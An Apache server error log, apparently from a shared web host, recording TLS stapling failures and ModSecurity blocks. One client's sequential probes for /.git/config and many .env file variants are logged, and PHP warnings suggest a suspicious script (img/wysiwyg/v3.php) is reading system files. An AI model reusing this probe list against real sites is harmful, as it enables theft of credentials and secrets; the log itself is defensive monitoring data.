[Mon May 11 17:32:58.939242 2026] [ssl:error] [pid 1411201:tid 1411267] AH01941: stapling_renew_response: responder error
[Mon May 11 17:32:59.974938 2026] [ssl:error] [pid 1411201:tid 1411257] (EAI 2)Name or service not known: [client 216.157.42.94:5297] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:32:59.974974 2026] [ssl:error] [pid 1411201:tid 1411257] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:00.244194 2026] [security2:error] [pid 1411055:tid 1411069] [client 101.32.49.171:55662] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agH2rEWKUxpmnkK7zHyVrgAAAQw"]
[Mon May 11 17:33:01.023200 2026] [ssl:error] [pid 1411055:tid 1411077] (EAI 2)Name or service not known: [client 216.157.42.83:19741] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:01.023246 2026] [ssl:error] [pid 1411055:tid 1411077] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:06.824636 2026] [security2:error] [pid 1424905:tid 1424915] [client 101.32.49.171:49246] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/"] [unique_id "agH2soW8yzYoWG_eyCWuSQAAAUc"], referer: http://www.maelbailly.fr
[Mon May 11 17:33:07.740772 2026] [ssl:error] [pid 1411099:tid 1411111] (EAI 2)Name or service not known: [client 216.157.41.74:21326] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:07.740804 2026] [ssl:error] [pid 1411099:tid 1411111] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:08.058701 2026] [ssl:error] [pid 1411055:tid 1411081] (EAI 2)Name or service not known: [client 216.157.41.75:25869] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:08.058741 2026] [ssl:error] [pid 1411055:tid 1411081] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:08.646120 2026] [ssl:error] [pid 1412074:tid 1412091] (EAI 2)Name or service not known: [client 216.157.41.89:54827] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:08.646166 2026] [ssl:error] [pid 1412074:tid 1412091] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:09.388327 2026] [ssl:error] [pid 1411201:tid 1411260] (EAI 2)Name or service not known: [client 216.157.41.74:23377] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:09.388374 2026] [ssl:error] [pid 1411201:tid 1411260] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:09.607049 2026] [ssl:error] [pid 1411055:tid 1411073] (EAI 2)Name or service not known: [client 216.157.41.94:29103] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:09.607090 2026] [ssl:error] [pid 1411055:tid 1411073] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:09.821654 2026] [ssl:error] [pid 1416109:tid 1416134] (EAI 2)Name or service not known: [client 216.157.41.89:48912] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:09.821689 2026] [ssl:error] [pid 1416109:tid 1416134] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:10.714697 2026] [ssl:error] [pid 1412074:tid 1412086] (EAI 2)Name or service not known: [client 216.157.41.89:56453] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:10.714734 2026] [ssl:error] [pid 1412074:tid 1412086] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:11.142090 2026] [ssl:error] [pid 1424905:tid 1424922] (EAI 2)Name or service not known: [client 216.157.41.87:11258] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 17:33:11.142126 2026] [ssl:error] [pid 1424905:tid 1424922] AH01941: stapling_renew_response: responder error
[Mon May 11 17:33:12.373188 2026] [:error] [pid 1412074:tid 1412082] [client 185.213.174.48:41366] File does not exist: /home/ofcrysta/public_html/index.php
[Mon May 11 17:33:12.390198 2026] [:error] [pid 1411201:tid 1411268] [client 185.213.174.48:41358] File does not exist: /home/ofcrysta/public_html/index2.php
[Mon May 11 17:33:12.390477 2026] [:error] [pid 1411055:tid 1411067] [client 185.213.174.48:41354] File does not exist: /home/ofcrysta/public_html/index2.php
[Mon May 11 17:33:14.505075 2026] [authz_core:error] [pid 1411099:tid 1411115] [client 52.242.216.199:58452] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/block-patterns/error_log
[Mon May 11 17:33:16.207561 2026] [core:error] [pid 1411055:tid 1411074] (104)Connection reset by peer: [client 3.15.40.244:45694] AH00574: ap_content_length_filter: apr_bucket_read() failed
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/a9/173f1ed00a631a07eee32e40156755c69aa0d0 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/a9/173f1ed00a631a07eee32e40156755c69aa0d0 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/a9/816b06f0e9c3b5bb94ae02bd491e54b0b5d068 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/a9/816b06f0e9c3b5bb94ae02bd491e54b0b5d068 in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 17:33:22.705089 2026] [core:error] [pid 1412074:tid 1412088] (104)Connection reset by peer: [client 3.15.40.244:57384] AH00574: ap_content_length_filter: apr_bucket_read() failed
[Mon May 11 17:33:28.388575 2026] [core:error] [pid 1424905:tid 1424919] (104)Connection reset by peer: [client 3.15.40.244:57390] AH00574: ap_content_length_filter: apr_bucket_read() failed
[Mon May 11 17:33:29.052608 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agH2yTJnyuKVXoStDhbMpwAAAEs"]
[Mon May 11 17:33:29.052843 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.git/config"] [unique_id "agH2yTJnyuKVXoStDhbMpwAAAEs"]
[Mon May 11 17:33:29.053070 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yTJnyuKVXoStDhbMpwAAAEs"]
[Mon May 11 17:33:29.289718 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agH2yTJnyuKVXoStDhbMqgAAAEs"]
[Mon May 11 17:33:29.289953 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env"] [unique_id "agH2yTJnyuKVXoStDhbMqgAAAEs"]
[Mon May 11 17:33:29.290224 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yTJnyuKVXoStDhbMqgAAAEs"]
[Mon May 11 17:33:29.404008 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.local"] [unique_id "agH2yTJnyuKVXoStDhbMqwAAAEs"]
[Mon May 11 17:33:29.404252 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.local"] [unique_id "agH2yTJnyuKVXoStDhbMqwAAAEs"]
[Mon May 11 17:33:29.404500 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yTJnyuKVXoStDhbMqwAAAEs"]
[Mon May 11 17:33:29.518876 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.production"] [unique_id "agH2yTJnyuKVXoStDhbMrAAAAEs"]
[Mon May 11 17:33:29.519122 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.production"] [unique_id "agH2yTJnyuKVXoStDhbMrAAAAEs"]
[Mon May 11 17:33:29.519379 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yTJnyuKVXoStDhbMrAAAAEs"]
[Mon May 11 17:33:29.703324 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.staging"] [unique_id "agH2yTJnyuKVXoStDhbMrQAAAEs"]
[Mon May 11 17:33:29.703551 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.staging"] [unique_id "agH2yTJnyuKVXoStDhbMrQAAAEs"]
[Mon May 11 17:33:29.703791 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yTJnyuKVXoStDhbMrQAAAEs"]
[Mon May 11 17:33:29.933891 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.development"] [unique_id "agH2yTJnyuKVXoStDhbMrgAAAEs"]
[Mon May 11 17:33:29.934118 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.development"] [unique_id "agH2yTJnyuKVXoStDhbMrgAAAEs"]
[Mon May 11 17:33:29.934343 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yTJnyuKVXoStDhbMrgAAAEs"]
[Mon May 11 17:33:30.050774 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.test"] [unique_id "agH2yjJnyuKVXoStDhbMrwAAAEs"]
[Mon May 11 17:33:30.051058 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.test"] [unique_id "agH2yjJnyuKVXoStDhbMrwAAAEs"]
[Mon May 11 17:33:30.051311 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yjJnyuKVXoStDhbMrwAAAEs"]
[Mon May 11 17:33:30.166229 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.remote"] [unique_id "agH2yjJnyuKVXoStDhbMsAAAAEs"]
[Mon May 11 17:33:30.166450 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.remote"] [unique_id "agH2yjJnyuKVXoStDhbMsAAAAEs"]
[Mon May 11 17:33:30.166692 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yjJnyuKVXoStDhbMsAAAAEs"]
[Mon May 11 17:33:30.446767 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.bak"] [unique_id "agH2yjJnyuKVXoStDhbMsQAAAEs"]
[Mon May 11 17:33:30.446991 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.bak"] [unique_id "agH2yjJnyuKVXoStDhbMsQAAAEs"]
[Mon May 11 17:33:30.447219 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yjJnyuKVXoStDhbMsQAAAEs"]
[Mon May 11 17:33:30.561788 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.backup"] [unique_id "agH2yjJnyuKVXoStDhbMsgAAAEs"]
[Mon May 11 17:33:30.562008 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "habilis.space"] [uri "/.env.backup"] [unique_id "agH2yjJnyuKVXoStDhbMsgAAAEs"]
[Mon May 11 17:33:30.562230 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "habilis.space"] [uri "/403.shtml"] [unique_id "agH2yjJnyuKVXoStDhbMsgAAAEs"]
[Mon May 11 17:33:30.676997 2026] [security2:error] [pid 1412074:tid 1412087] [client 3.15.40.244:57404] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "habilis.space"] [uri "/.env.save"] [unique_id "agH2yjJnyuKVXoStDhbMtAAAAEs"]
